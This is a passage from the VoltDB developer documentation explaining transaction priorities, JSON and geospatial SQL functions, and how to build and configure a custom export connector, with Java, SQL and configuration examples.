sample application included with the VoltDB software to help us understand how\nprioritization works. Normally, the transactions execute on a first in, first out basis (see Figure A below).\nIn the case of the voter application, the critical transactions are the votes being counted by the Vote stored\nprocedure. If you were to prioritize the transactions you are likely to prioritize Vote over Results, which\nis a convenience procedure that simply provides a summary of the voting thus far and does not need\ninstantaneous response time.\nNow, as the application is currently written, the Results procedure does not need prioritizing because it\nonly runs once every five seconds and has little impact on the voting (see Figure B). However, if you make\nthe summary report available on request, it is conceivable that people repeatedly refreshing the report,\ngenerating multiple invocations of the Results procedure, could delay processing of the Vote procedure\n(see Figure C).\n28Prioritizing Transactions\nThe solution is to prioritize the transactions, so that the Vote invocations are processed more frequently\nthan Results invocations. In VoltDB, when you enable prioritized queuing, you can specify a priority from\n1 to 8: priority 1 being the most critical and priority 8 being the least.1\nTwo things happen internally when you prioritize a stored procedure call:\n•First, the client itself prioritizes the requests. If the application is making database calls faster than the\nserver can queue them, the client prioritizes the backlog of requests and sends them to the server(s)\nbased on the priority assigned to each invocation.\n•Once the requests reach the partition on the server, the individual transactions are sorted into separate\nqueues for each priority value. Then the execution engine processes the transactions based on those\npriorities, processing transactions from the high priority queues more frequently than from the lower\npriority queues.\nFigure D shows how by assigning different priorities to the Vote and Results procedures (1 and 5, respec-\ntively), you can ensure more Vote invocations run and ad hoc Results requests cannot overwhelm the sys-\ntem.\n1There are actually nine priority levels, from zero (0) to eight. The most critical, priority zero, is reserved for system functions and cannot be\nspecified by the user.\n29Prioritizing Transactions\n6.2. Enabling Prioritized Transactions\nThe first thing you must do to prioritize your transactions is to enable priority queues on the server. You\ndo this by enabling <priorities> (a child element of <systemsettings> ) in the database config-\nuration file. For example:\n<systemsettings> \n <priorities enabled=”true”/>\n</systemsettings>\nYou must set this property when you initialize the database root directory. You cannot change the queueing\nbehavior after the database starts.\n6.3. Prioritizing Transactions at Runtime\nYou prioritize an individual transaction by specifying the priority as an option during the procedure call.\nNote that you must be using the new Client2 Java client API to do this. For example, to set the priority\nfor the Vote procedure invocation to one (1), you create a Client2CallOptions object with the priority set\nto 1, then include it as the first argument to the procedure call:\nClient2CallOptions voteprio = new Client2CallOptions()\n .requestPriority(1);\nCompletableFuture<void> votecf;\n30Prioritizing Transactions\nvotecf = client.callProcedureAsync( voteprio , \"Vote\", \n phonenum, contestant, maxvotes);\nSimilarly, if you want to assign the Report procedure a priority of five (5), you specify the priority in that\nprocedure’s invocation option:\nClient2CallOptions resultprio = new Client2CallOptions()\n .requestPriority(5);\nCompletableFuture<void> resultcf;\nresultcf = client.callProcedureAsync( resultprio , \"Results\");\nAlternately, you can leave off the priority parameter and let the invocation receive a default value. So,\nfor example, you can set the default priority to five with the .requestPriority method as part of the client\nconfiguration, and use call options to raise the priority of calls to the Vote procedure:\nClient2Config config = new Client2Config()\n .requestPriority(5);\nClient2 client = ClientFactory.createClient(config);\n [ ... ]\nvotecf = client.callProcedureAsync( voteprio , \"Vote\", \n phonenum, contestant, maxvotes);\nresultcf = client.callProcedureAsync(\"Results\");\nIt is important to note that you can and should reuse call options for multiple calls that require the same\noptions, rather than creating a new Client2Calloptions object for each call.\n6.4. Prioritizing Other Types of Transactions\nThere are many other types of transactions besides just stored procedure calls. There are transactions\nassociated with database replication (DR) and snapshots, as well as transactions associated with import\nand topics. You cannot set a priority for individual instances of these more automated transactions, but\nyou can set a priority for them as a group or class as part of the database configuration.\nYou specify the priority for snapshot and DR transactions in the configuration file using subelements of\n<systemsettings >/<priorities> . Each subelement takes an attribute, priority , that sets the\npriority of that class of transactions. For example, the following configuration sets the priority of DR\ntransactions to 3 and snapshots to 7:\n<systemsettings> \n <priorities enabled=”true”>\n <dr priority=\"3\"/>\n <snapshot priority=\"7\"/>\n </priorities>\n</systemsettings>\nFor import and topics, you can specify a priority for the transactions associated with individual import\nconfigurations and individual topics.You specify the priority as an attribute of the <configuration> or\n<topic> element for that target. For example, the following configuration sets the priority for the Kafka\nimport configuration at 3 and the priority for the alerts and misc topics at 2 and 7, respectively:\n<import>\n31Prioritizing Transactions\n <configuration type=\"kafka\" priority=\"3\" >\n [ ...]\n </configuration>\n</import>\n<topics>\n <topic name=\"alerts\" priority=\"2\" procedure=\"catchAlerts\"/>\n <topic name=\"misc\" priority=\"7\" procedure=\"grabBag\"/>\n</topics>\n32Chapter 7. Creang Flexible Schemas\nWith JSON\nA major part of any relational database is the schema: the structure of the data as defined by the tables and\ncolumns. It is possible to change the schema when necessary. However, at any given time, each table has\na set number of columns, each with a specific name and datatype.\nIt is possible to store unstructured data in a relational database as a \"blob\" using a VARBINARY or\nVARCHAR column. However, the database has no way to operate on your data effectively beyond simply\nstoring and retrieving it.\nSometimes data is not as strictly organized as a relational database schema requires, but does have structure\nwithin it. For example, a table may have a set of properties, each with a different name and matching value.\nBut not all records use the same set of properties.\nJSON (JavaScript Object Notation) is a light-weight data interchange format that lets you describe data\nstructures on the fly. JSON-encoded strings are composed of a hierarchy of key-value pairs that can be\nas simple or as complex as needed. More importantly, the actual structure of the object is determined at\nrun-time and does not need to be predefined.\nVoltDB gives you the ability to mix the efficiency of the relational schema with the flexibility of JSON.\nBy using JSON-encoded columns with VoltDB SQL functions and index capabilities, you can work more\nnaturally with JSON data while maintaining the efficiency and transactional consistency of a relational\ndatabase.\n7.1. Using JSON Data Structures as VoltDB Con-\ntent\nJSON processing is easiest to understand by example. For the purposes of this chapter, we will use the\nexample of a single sign-on (SSO) application using VoltDB. The application needs to store login sessions\nfor multiple online sites under a common username. Each login session must manage different properties\ndescribing the state of the session, where properties can vary from simple data values to more complex data\nstructures. Additionally, future enhancements to the application may change what properties are required.\nBecause of the variability of the data, a good strategy is to store this session information as JSON data\nstructures.\nTo store JSON data in VoltDB, you declare the storage as a standard VARCHAR column, large enough\nto contain the maximum expected length of the JSON data. For example, the following table declaration\nincludes a VARCHAR column named session_info with a maximum length of 2048 characters.\nCREATE TABLE user_session_table (\n username VARCHAR(200) UNIQUE NOT NULL,\n password VARCHAR(100) NOT NULL,\n global_session_id VARCHAR(200) ASSUMEUNIQUE NOT NULL,\n last_accessed TIMESTAMP,\n session_info VARCHAR(2048)\n);\nPARTITION TABLE user_session_table ON COLUMN username;\nThe JSON data is stored as text and it is up to your application to perform the conversion from an in-\nmemory structure to the textual representation. For example, the VoltDB software kit includes an example,\n33Creating Flexible\nSchemas With JSON\njson-sessions , that provides a version of the application described here, which uses an open source package\nfrom Google called GSON to convert from plain old Java objects (POJOs) to text and vice versa.\nOnce you have a text representation of the JSON object, you insert it into the database column using\nstandard SQL syntax. For example:\nINSERT INTO user_session_table (username, password,\n global_session_id, \n last_accessed, session_info) \n VALUES (?, ?, ?, ?, ?);\nNote that VoltDB does not validate that the text being inserted into the VARCHAR column is properly\nencoded JSON. Validation of the encoding occurs when accessing such columns using the JSON-specific\nfunctions, described next.\n7.2. Querying JSON Data\nVoltDB provides four functions to help you interact effectively with JSON data stored in VARCHAR\ncolumns. Each function takes a JSON-encoded text string as the first argument, followed by other argu-\nments required for the operation.\nFunction Description\nARRAY_ELEMENT( json, array-index ) Returns the value of a specific element in a JSON\narray.\nARRAY_LENGTH( json) Returns the number of elements in a JSON array\nFIELD(json, path-name ) Returns the value of a specific field in a JSON struc-\nture, where the field is identified by path name.\nSET_FIELD( json, path-name , new-value ) Returns a JSON structure where the specified field's\nvalue is updated.\nIn the simple case where the JSON is a flat list of named fields, the FIELD() function can extract the value\nof one of the fields:\nSELECT username, FIELD(session_info,'website') AS url\n FROM user_session_table WHERE username=?;\nThe FIELD() can also take a path name for more complex JSON structures. For example, if the properties\nfield is itself a list of named fields, you can drill down into the structure using a path, like so:\nSELECT username, FIELD(session_info,'website') AS url,\n FIELD(session_info,'properties.last_login') AS last_login\n FROM user_session_table WHERE username=?;\nFor structures containing arrays, you can use ARRAY_ELEMENT() to extract a specific element from the\narray by position. For example, the following SELECT statement extracts the first element from a JSON\ncolumn named recent_history. (The array index is zero-based.)\nSELECT username, \n ARRAY_ELEMENT(recent_history,0) AS most_recent\n FROM user_history WHERE username=?;\nFinally, you can nest the functions to perform more complex queries. Say rather than being a separate\ncolumn, the named array recent_history is a subelement of the properties field in the session_info column,\nthe following query retrieves the last element from the recent_history array:\n34Creating Flexible\nSchemas With JSON\nSELECT username, \n ARRAY_ELEMENT(FIELD(session_info,'properties.recent_history'),\n ARRAY_LENGTH(FIELD(session_info,'properties.recent_history'))-1) \n AS oldest\n FROM user_session_table WHERE username=?;\nNote that, as mentioned earlier, VoltDB does not validate the correctness of the JSON-encoded string\non input into a VARCHAR column. Instead, VoltDB validates the data when one of the JSON functions\nattempts to parse the encoded string. If the data is not a valid JSON-encoded string, the function will throw\nan exception at run-time and rollback the transaction.\n7.3. Updating JSON Data\nThe JSON functions can not only query the JSON-encoded data, they let you modify a JSON-encoded\nstring in place. The SET_FIELD() function takes JSON data as input and returns the same JSON structure\nbut with the specified field updated. For example, using the user_session_table described in the previous\nsection, it is possible to update the last_login property in the JSON column session_info with a single\nSQL statement:\nUPDATE user_session_table \n SET session_info = SET_FIELD(session_info,'properties.last_login',?)\n WHERE username=? AND global_session_id=?;\nAgain, the JSON functions can be nested to perform more complex operations. In the following example,\nthe UPDATE statement takes a full JSON encoded-string as input for the session_info column, but merges\nit with the properties value from the existing record.\nCREATE PROCEDURE merge_properties AS\n PARTITION ON TABLE user_session_table COLUMN username\n AS\n UPDATE user_session_table \n SET session_inf = SET_FIELD(?,'properties',\n FIELD(session_info,'properties'))\n WHERE username=?;\n7.4. Indexing JSON Fields\nThe JSON functions perform significant string processing to encode and decode the JSON structures. If\nthe table does not have appropriate indexes, the extra processing required for JSON columns added to the\nneed to scan all of the records in the table can quickly result in undesirable latency. The solution is to\nindex the pertinent JSON operations.\nTo speed up query execution for JSON queries, you can define an index on the commonly accessed fields,\nincluding the commonly used function instances. For example, the following index definitions can signif-\nicantly improve the execution time for queries described in the previous sections:\nCREATE INDEX session_index_last_login\n ON user_session_table (\n field(session_info, 'properties.last_login'), \n username\n );\nCREATE INDEX session_index_history \n ON user_session_table (\n35Creating Flexible\nSchemas With JSON\n ARRAY_ELEMENT(FIELD(session_info,'properties.recent_history'),\n ARRAY_LENGTH(FIELD(session_info,'properties.recent_history'))-1),\n username\n );\nThese are fully functional SQL indexes. Whenever you create or update a record in the user_session_table\ntable, VoltDB executes the JSON functions and stores the result inside the index. When you query by that\nsame function in the future, VoltDB uses the index avoids both the table scan and repeating the JSON\nstring processing.\n7.5. Summary: Using JSON in VoltDB\nOne of the major benefits of encoding data as JSON is that you do not have to predefine what structure\nor shape the data has. Further, the shape of the data can vary from one row to the next. The schema for\nJSON columns are defined by the data itself, rather than having to define the structure using SQL ahead\nof time. If a new field is needed, you simply create the appropriate data object in whatever programming\nlanguage you are using, serialize it to JSON, and store it in VoltDB. This avoids the need to change the\ndatabase schema anytime these temporary data structures change.\nOn the other hand, when using JSON columns you should be aware of the following drawbacks:\n•Your application must be intelligent enough to interpret the various structures that appear in the JSON\ncolumns.\n•Evaluating JSON data using the VoltDB JSON functions requires additional processing overhead. JSON\nis excellent for managing fluid data structures, but it is always significantly faster to used a predefined\nSQL schema when possible.\n•You must be sensitive to when indexes are needed, should query patterns or the data structures change.\nThis may, for example, require you to add (or modify) indexes based on the existence of new JSON\nfields.\nAnother point of note is that there is a size limit for JSON values. In VoltDB, the VARCHAR columns\nused to store JSON values are limited to one megabyte (1048576 bytes). JSON support lets you augment\nthe existing relational model within VoltDB. However, it is not intended or appropriate as a replacement\nfor pure blob-oriented document stores.\n36Chapter 8. Creang Geospaal\nApplicaons\nVoltDB provides standard datatypes for storing common numeric and textual content. It also provides\nsupport for JSON within VARCHAR columns to handle semi-structured content, as described in the pre-\nceding chapter . But not all application data can be efficiently managed using just the standard datatypes.\nOne example of an application area requiring special handling is geospatial data — that is, information\nabout locations and regions on the earth. It is possible to store geospatial data using standard datatypes;\nfor example, storing longitude and latitude as two separate FLOAT columns. However, by storing the data\nin generic datatype columns the information loses its context. For example, using separate columns it is\nimpossible to tell how far apart two points are or whether those points are part of a larger geometric shape.\nTo simplify the use of geospatial information, VoltDB includes two geospatial datatypes and a number of\nfunctions that help you evaluate and operate on that data. This chapter describes the new datatypes and\nprovides basic information on how to input and use that data in stored procedures and SQL queries.\n8.1. The Geospatial Datatypes\nVoltDB supports two geospatial datatypes:\n•GEOGRAPHY\n•GEOGRAPHY_POINT\nThe GEOGRAPHY datatype supports geographical regions defined as polygons. The GEOGRA-\nPHY_POINT datatype defines a single point using a pair of longitude and latitude values. Both datatypes\ncan be represented as text in an industry format known as Well Known Text (WKT) defined by the Open\nGeospatial Consortium (OGC) . VoltDB provides functions for converting WKT representations to both\nGEOGRAPHY and GEOGRPAHY_POINT values. WKT is also how values of these types are displayed\nby sqlcmd and the VoltDB Management Center. Since GEOGRAPHY_POINT is the simpler of the two\npoints, we will discuss it first.\n8.1.1. The GEOGRAPHY_POINT Datatype\nA GEOGRAPHY_POINT represents a single point on earth as defined by a longitude and latitude value.\nThe WKT representation of a GEOGRAPHY_POINT value is the following:\nPOINT ( longitude-value latitude-value )\nThe longitude is a floating point value between 180 and -180 inclusive. The latitude is a floating point\nvalue between 90 and -90 inclusive.\n8.1.2. The GEOGRAPHY Datatype\nThe GEOGRAPHY datatype defines a bounded region of the earth represented by one or more polygons.\nThe first polygon, or ring, describes the outer boundary of the region. Subsequent rings within the WKT\nrepresentation describe \"holes\" within the outer region. So, for example, the following shaded region is\ndescribed by three rings:\n•The outer ring, A\n37Creating Geospatial Applications\n•Two inner rings, B and C\nIn the WKT representation, the outer ring must be listed first, with the vertices listed in counter-clockwise\norder (e.g. A5, A4, A3, A2, A1). The inner rings, if any, are listed next with the vertices in clockwise order\n(e.g. B1, B2, B3). The lines of the rings must not cross or overlap and the description of each ring must\nlist the starting vertex twice: as both the first and last vertex.\nNote that, although the individual rings must not cross and vertices must be in the correct order for the\ngeospatial functions to generate valid results, the correctness of the polygon is not checked by VoltDB\nwhen the GEOGRAPHY data is inserted. If you are unsure of the correctness of the originating data, you\ncan use the ISVALID() and ISINVALIDREASON() functions to validate GEOGRAPHY values within\na SQL query.\nThe WKT representation of a GEOGRAPHY value is the following, where each vertex-list is a com-\nma-separated list of longitude and latitude values describing a single ring:\nPOLYGON ( ( vertex-list ) [ , ( vertex-list ) ]... )\nFor example, the simplest polygon, which consists of a single outer ring of three vertices, could be rep-\nresented like this:\nPOLYGON ( ( 1.5 3.0, 0.0 0.0, 3.0 0.0, 1.5 3.0 ) )\nFor a polygon with two inner rings, the WKT might look like the following:\nPOLYGON ( ( 1.5 3.0, 0.0 0.0, 3.0 0.0, 1.5 3.0 ),\n ( 1.0 1.0, 1.5 0.5, 0.5 0.5, 1.0 1.0 ),\n ( 2.0 1.0, 2.5 0.5, 1.5 0.5, 2.0 1.0 ) )\n8.1.3. Sizing GEOGRAPHY Columns\nGEOGRAPHY polygons, unlike GEOGRAPHY_POINT values, do not have a fixed size. The memory\nrequired to store a GEOGRAPHY column varies depending on the number of rings and the number of\nvertices in each ring. In this way, GEOGRAPHY columns are treated much like VARCHAR and VAR-\nBINARY columns when VoltDB manages their allocation and storage.\nFor convenience, VoltDB provides a default maximum size for GEOGRAPHY columns. So if you declare\nthe column without a specific size, it is assigned a maximum size of 32 kilobytes (32768 bytes):\nCREATE TABLE Country (\n Name VARCHAR(32),\n38Creating Geospatial Applications\n Border GEOGRAPHY\n);\nHowever, for very large polygons, this default size may be too small. Or, if you have GEOGRAPHY\ncolumns mixed with large VARCHAR columns in a single table, the default may be too large because\nthere is a two megabyte limit for the sum of the columns in a single table.\nYou can specify your own maximum size for a GEOGRAPHY column, in bytes, by including the maxi-\nmum size in parentheses after the datatype keyword, the same way you do for VARCHAR columns. For\nexample, the following CREATE TABLE statement defines the maximum size of the border column as\n1024 bytes:\nCREATE TABLE Country (\n Name VARCHAR(32),\n Border GEOGRAPHY(1024)\n);\nTo determine how much space is required to store any polygon, use the following calculation:\n•40 bytes for the polygon\n•43 bytes for every ring\n•24 bytes for every vertex\nNote that when counting the vertices, although the starting vertex must be listed twice in the WKT repre-\nsentation, it is only stored once and therefore only counted once in the memory allocation. For example,\nthe memory calculation for a polygon with an outer ring with 10 vertices and 3 inner rings with 8 vertices\neach would be the following:\n 40 bytes\n 172 bytes ( 43 X 4 rings )\n 816 bytes ( 24 X 34 total vertices )\n ------------\n 1028 bytes total\nThe largest maximum size you can specify for a GEOGRAPHY column, or any column in VoltDB, is\none megabyte.\n8.1.4. How Geospatial Values are Interpreted\nThe earth itself is not uniformly round. However, measurements accurate enough for most applications\ncan be achieved by assuming a perfect sphere and mapping the longitude and latitude coordinates onto\nthat sphere. For calculating distances between locations and areas of regions VoltDB assumes a sphere\nwith a radius matching the mean radius of the earth, or 6,371,008.8 meters. Although an approximation,\nthis model provides distance calculations accurate to within three tenths of a percent (0.3%) of other, more\nelaborate geospatial models. What this means is, when calculating the distance between two points that\nare a kilometer apart, the answer computed by the DISTANCE() function may vary up to 3 meters from\ncalculations using other techniques.\n8.2. Entering Geospatial Data\nAs mentioned earlier, Well Known Text (WKT) is the standard presentation VoltDB uses for ingesting and\nreporting on geospatial data. However, you cannot insert WKT text strings directly as geospatial values.\n39Creating Geospatial Applications\nInstead, VoltDB provides SQL functions and Java classes and methods for translating from WKT to the\ninternal geospatial values.\nIn SQL statements you can use the POINTFROMTEXT() and POLYGONFROMTEXT() functions to\ngenerate the appropriate geospatial datatypes from WKT. For example, the following SQL statement in-\nserts the geographic location of New York City into the GEOGRAPHY_POINT column location:\nINSERT INTO CITIES (name, location) VALUES\n ('New York City', POINTFROMTEXT(' POINT(-74.0059 40.7127) ');\nIn a Java stored procedure you can generate and store a GEOGRAPHY or GEOGRAPHY_POINT val-\nue from WKT using the classes GeographyValue and GeographyPointValue and the method\n.fromWKT() . For example, the following stored procedure takes two Java String objects, converts them\nto GEOGRAPHY and GEOGRAPHY_POINT values, then inserts them into a record via placeholders in\nthe SQL statement:\nimport org.voltdb.*;\nimport org.voltdb.types.GeographyValue;\nimport org.voltdb.types.GeographyPointValue; \npublic class InsertGeo extends VoltProcedure {\n public final SQLStmt insertrec = new SQLStmt(\n \"INSERT INTO region VALUES (?,?,?);\" );\n public VoltTable[] run( \n String name, String poly, String point)\n throws VoltAbortException {\n \n GeographyValue g = GeographyValue.fromWKT (poly);\n GeographyPointValue p = GeographyPointValue.fromWKT (point);\n voltQueueSQL( insertrec, name, p, g);\n return voltExecuteSQL();\n }\n}\nA third option is to use the .fromWKT() method to create instances of GeographyValue and Geography-\nPointValue in the client application and pass the data to the stored procedure as native geospatial types.\nWhen retrieving geospatial data from the database, the ASTEXT() SQL function converts from a GE-\nOGRAPHY or GEOGRAPHY_POINT value to its textual representation. (You can also use the CAST(\nvalue AS VARCHAR) function). In a stored procedure or Java client application, you can use the\n.toString() method of the GeographyValue or GeographyPointValue class.\n8.3. Working With Geospatial Data\nIn addition to the classes, methods, and functions to insert and extract geospatial data from the database,\nVoltDB provides other SQL functions to help you manipulate the data. The functions fall into three main\ncategories:\n•Converting to and from WKT representations:\nASTEXT()\nPOLYGONFROMTEXT()\n40Creating Geospatial Applications\nPOINTFROMTEXT()\nVALIDPOLYGONFROMTEXT()\n•Performing geospatial calculations:\nAREA()\nCENTROID()\nCONTAINS()\nDISTANCE()\nDWITHIN()\nLATITUDE()\nLONGITUDE()\n•Analyzing the structure of a region:\nMAKEVALIDPOLYGON()\nISVALID()\nISINVALIDREASON()\nNUMINTERIORRINGS()\nNUMPOINTS()\nThe following sections provide examples of using these functions on both locations and regions.\n8.3.1. Working With Locations\nFor geospatial locations, the data is often available as numeric values — longitude and latitude — rather\nthan as WKT. In this case, you need to convert the numeric data to WKT before converting and inserting\nit as a GEOGRAPHY_POINT value.\nFor example, The VoltDB Tutorial uses data from the US Geographic Names Information Service (GNIS)\nto create a database of geographic locations. The original source data also includes the longitude and\nlatitude of those locations. So it is easy to modify the database schema to add a location for each town:\nCREATE TABLE towns (\n town VARCHAR(64),\n state VARCHAR(2),\n state_num TINYINT NOT NULL,\n county VARCHAR(64),\n county_num SMALLINT NOT NULL,\n location GEOGRAPHY_POINT ,\n elevation INTEGER\n);\nHowever, the incoming data includes two floating point values rather than a GEOGRAPHY_POINT value\nor WKT. One solution is to create a simple stored procedure to perform the conversion to WKT and insert\nthe record using the POINTFROMTEXT() function:\npublic class InsertTown extends VoltProcedure {\n public final SQLStmt insertrec = new SQLStmt(\n \"INSERT INTO TOWNS VALUES (?,?,?,?,?, POINTFROMTEXT (?),?);\"\n );\n public VoltTable[] run( String t, String s, byte sn,\n String c, short cn,\n41Creating Geospatial Applications\n double latitude, double longitude,\n long e)\n throws VoltAbortException {\n String wkt = \"POINT( \" + \n String.valueOf(longitude) + \" \" +\n String.valueOf(latitude) + \")\";\n voltQueueSQL( insertrec, t,s,sn, c, cn, wkt, e);\n return voltExecuteSQL();\n }\n}\nOnce the data is imported into the database, it is possible to use the geospatial functions to perform mean-\ningful queries on the locations, such as determining which town is closest to a specific location (such as\na cell phone user):\nSELECT town, state FROM TOWNS \n ORDER BY DISTANCE(location,CAST(? AS GEOGRAPHY_POINT)) \n ASC LIMIT 1;\nOr which town is furthest north:\nSELECT town, state FROM TOWNS ORDER BY LATITUDE(location) DESC LIMIT 1;\n8.3.2. Working With Regions\nThe textual representation for regions, or polygons, are not as easily constructed as geographic points.\nTherefore if you do not have region data already in WKT, your client application will need to generate\nWKT from whatever source data you are using.\nOnce you have the WKT representation, you can insert the data using a simple stored procedure similar\nto the example given above for locations. Since the data is already in WKT, you can even define the\nstored procedure using a CREATE PROCEDURE AS statement. The following example defines a table\nfor storing information about the names and regions of national parks. It also defines the insert procedure\nfor ingesting records from existing WKT data:\nCREATE TABLE parks (\n park VARCHAR(64),\n park_code VARCHAR(2),\n border GEOGRAPHY\n);\nCREATE PROCEDURE InsertPark AS\n INSERT INTO parks VALUES (?,?, POLYGONFROMTEXT(?) );\nAs mentioned before, VoltDB does not validate the structure of the GEOGRAPHY polygon on input. So,\nif you are not positive the WKT representation meets the rules for a valid polygon, you should use the\nISVALID() function on the GEOGRAPHY value before or after insertion to verify that your data is correct.\nFor example, the following SQL statement uses the ISVALID() and ISINVALIDREASON() functions to\nreport on all invalid park regions and the reason for the exception:\nSELECT park, park_code, ISINVALIDREASON(border) \n FROM Parks WHERE NOT ISVALID(border) ORDER BY park;\nAlternately, you can use the VALIDPOLGYONFROMTEXT() function which combines the POLYGON-\nFROMTEXT() and ISVALID() functions into a single function, ensuring that only valid polygons are\ngenerated. The preceding InsertPark can be rewritten to validate the incoming data like so:\n42Creating Geospatial Applications\nCREATE PROCEDURE InsertPark AS\n INSERT INTO parks VALUES (?,?, VALIDPOLYGONFROMTEXT(?) );\nOf course, the rewritten procedure will take incrementally longer because it performs both the conver-\nsion and validation. However, it performs these functions in a single step. The VALIDPOLYGONFROM-\nTEXT() function will also correct simple errors in the WKT input. Specifically, it will correct any rings\nwhere the vertices are listed in the wrong direction.\nOnce you know your GEOGRAPHY data is valid, you can use the geospatial SQL functions to perform\nmeaningful queries on the data. (If the polygons are not valid, the geospatial functions will not generate\nan error but will also not produce meaningful results.) The functions that perform calculations on GEOG-\nRAPHY values are:\n•AREA() — the area of a region\n•CENTROID() — the geographic center point of a region\n•CONTAINS() — Whether a region contains a given point\n•DISTANCE() — distance between a point and a region (or between two points)\nFor example, the following SQL queries determine the three largest parks, what parks are closest to a given\ntown, and what towns are contained with the region of a given park:\nSELECT park, AREA(border) FROM Parks \n ORDER BY AREA(border) DESC LIMIT 3;\nSELECT p.park, DISTANCE(p.border,t.location)\n FROM parks AS P, towns AS T WHERE t.town=? \n ORDER BY DISTANCE(p.border,t.location) ASC LIMIT 5;\nSELECT t.town FROM parks AS P, towns AS T \n WHERE p.park=? AND CONTAINS(p.border,t.location);\n43Chapter 9. Creang Custom Importers,\nExporters, and Formaers\nVoltDB includes built-in export and import connectors for a number of standard formats, such as CSV\nfiles, JDBC, Kafka topics, and so on. If you have a data source or destination not currently covered by\nconnectors provided by VoltDB, you could write a custom application to perform the translation. However,\nyou would then need to manually coordinate the starting and stopping of your application with the starting\nand stopping of the database.\nA better approach is to create a custom import or export connector. Custom connectors run within the\nVoltDB process and use the standard mechanisms in VoltDB for synchronizing the running of the connec-\ntor with the database itself. You write custom connectors as Java classes, packaged in a JAR file, which\nVoltDB can access at runtime. This chapter provides instructions and sample code for writing, installing,\nand configuring custom export and import connectors. It also describes how to write custom formatters\nthat can be used to interpret the input coming from an import connector.\n9.1. Writing a Custom Exporter\nWarning\nNote that the VoltDB export subsystem has been extensively enhanced and improved and the\noriginal custom export interface is now deprecated, since it no longer supports all the necessary\nfeatures. The following sections describe the latest custom interface (introduced in VoltDB V8),\nwhich uses the same method names, but uses different signatures.\nTo use the new, supported interface, the onBlockStart(), onBlockCompletion(), and processRow()\nmethods must accept a single exportRow object, as described in the following sections. The older,\ndeprecated interface where the methods accept no arguments, or in the case of processRow(), two\narguments, will no longer be supported after the next major release.\nAn export connector, known internally as an ExportClient, is a Java class that receives blocks of row data\nwhen data is inserted into a stream within the database. The export connector is responsible for formatting\nand passing those rows to the downstream export target. The following sections describe:\n•The Structure and Workflow of the Export Client\n•How to Use Custom Properties to Configure the Client\n•How to Compile and Install the Client\n•How to Configure the Export Client\n9.1.1. The Structure and Workflow of the Export Client\nThe custom export client is declared as a Java subclass extending ExportClientBase. Within the subclass\nyou can override the configure() method, which receives any properties defined in the export connection\nconfiguration. The subclass must also declare the constructExportDecoder() method, which in turn gen-\nerates a subclass of ExportDecoderBase. This extension of ExportDecoderBase is the class that does the\nactual work at run time and must override the primary methods sourceNoLongerAdvertised(), onBlockS-\n44Creating Custom Importers,\nExporters, and Formatters\ntart(), processRow(), and onBlockCompletion. Figure 9.1, “Structure of the Custom Export Class” illus-\ntrates the structure of the custom client.\nFigure 9.1. Structure of the Custom Export Class\nAt run time, VoltDB passes data to the export client in blocks that are roughly 2MB in size but do not\nalign with transactions. A block is guaranteed to contain complete rows — that is, no single SQL INSERT\nto an export stream is split across blocks. The handoff from the internal VoltDB producer to the custom\nexport client follows a simple pattern:\nproducer -> client.onBlockStart\nforeach row in block:\n producer -> client.processRow\nproducer -> client.onBlockCompletion\nEach time the pattern executes, it runs within a single thread. Therefore, it is not necessary to synchronize\naccesses to the data structures used in client.onBlockStart, client.processRow, and client.onBlockComple-\ntion unless they are used in other threads as well.\nFor each row of data, the processRow() method is called. The object passed in as an argument contains\na full description of the row, including the column names, types, and values, which your client code can\niterate over. For example:\npublic boolean processRow(ExportRow row) \n throws RestartBlockException {\n for (int i =0; i < row.values.length; i++) {\n String column_name = row.names.get(i);\n Object column_value = row.values[i];\n // do work . . .\n }\nNote that each row starts with six columns of metadata, including the transaction ID and timestamp. If\nyou do not need this information, you can skip the first six columns. Also, within each block of export\ndata, the schema is constant. However, it is possible for the schema to change between blocks (if a schema\nchange is applied to the database while export is active). The custom client can evaluate the ExportRow\n45Creating Custom Importers,\nExporters, and Formatters\nobject passed into the onBlockStart() or processRow() method to recognize any changes to the schema\nand configure the downstream system as necessary to accept the new data.\nAs a rule, the custom client must balance the requirements to execute and return control quickly, so as not to\nblock other export threads (since connectors share a limited thread pool), against the need to ensure that the\nindividual rows are accepted and acknowledged by the downstream system before onBlockCompletion()\nreturns. If the client fails at onBlockStart, processRow or onBlockCompletion, the export client must throw\na RestartBlockException to prevent VoltDB from acknowledging (ACKing) and dropping the export data\nfrom its durability control. This point deserves repeating: if the custom ExportClient runs onBlockStart,\nprocessRow and onBlockCompletion without throwing the correct exception, VoltDB assumes the data is\nremotely durable and that the VoltDB database can discard that export block.\nThe ExportClient must not return from onBlockCompletion until it ensures the downstream target ac-\nknowledges receipt of the data.\n9.1.2. How to Use Custom Properties to Configure the Client\nProperties, set in the deployment file as part of the export configuration, let you pass information to the\nexport connector. For example, if the user needs to pass the export connector a file location or IP address\nfor the export target. What properties are necessary or supported is up to you as the author of the export\nclient to decide.\nThe properties specified in the deployment file are passed to the export client as a Properties object argu-\nment to the configure() method every time the connector starts. That is, whenever the database starts with\nthe connector enabled or whenever the schema or deployment is modified (for example, by a voltadmin\nupdate command).\nThe configure() method can either iterate over the Properties object or it can look for specific entries as\nneeded. For example:\npublic void configure(Properties config) throws Exception {\n \n // Check for specific property value\n if config.containsKey(\"filename\") {\n filename = config.getProperty(\"filename\");\n } \n}\n9.1.3. How to Compile and Install the Client\nOnce your export client code is complete, you need to compile, package, and install the connector on the\nappropriate VoltDB servers. You compile the export client like other Java methods. Be sure to include the\nVoltDB server jar file in the classpath. For example, if VoltDB is installed in a directory called voltdb in\nyour home directory, the command could be:\n$ javac -cp \"$HOME/voltdb/voltdb/*:./\" -d obj \\\n org.voltdb.exportclient/MyExportClient.java\nAfter compiling the source code, you must package the resulting class into a JAR file, like so:\n$ jar cvf myexportclient.jar -C obj .\nFinally you must install the JAR file in the lib/extension folder where VoltDB is installed on all servers\nin the cluster that will be running the export client. For, example, if you are running a single node cluster\n46Creating Custom Importers,\nExporters, and Formatters\non the current node, where VoltDB has been installed as $HOME/voltdb, you can copy the JAR file with\nthe following command:\n$ cp myexportclient.jar $HOME/voltdb/lib/extension/\n9.1.4. How to Configure the Export Client\nOnce your custom export client is installed you can configure and start it. Custom export clients are con-\nfigured like any other export connector, by adding a <configure> section to <export> in the de-\nployment file (or configuring it interactively in the VoltDB Management Center). For custom clients, you\ndeclare the connector type as \"custom\" and add the exportconnectorclass attribute specifying\nthe connector's Java classpath. For example:\n<export>\n <configuration enabled=\"true\" target=\"myspecial\" type=\" custom \" \n exportconnectorclass=\"org.voltdb.exportclient.MyExportClient\" >\n <property name=\"filename\">myexportfile.txt</property>\n 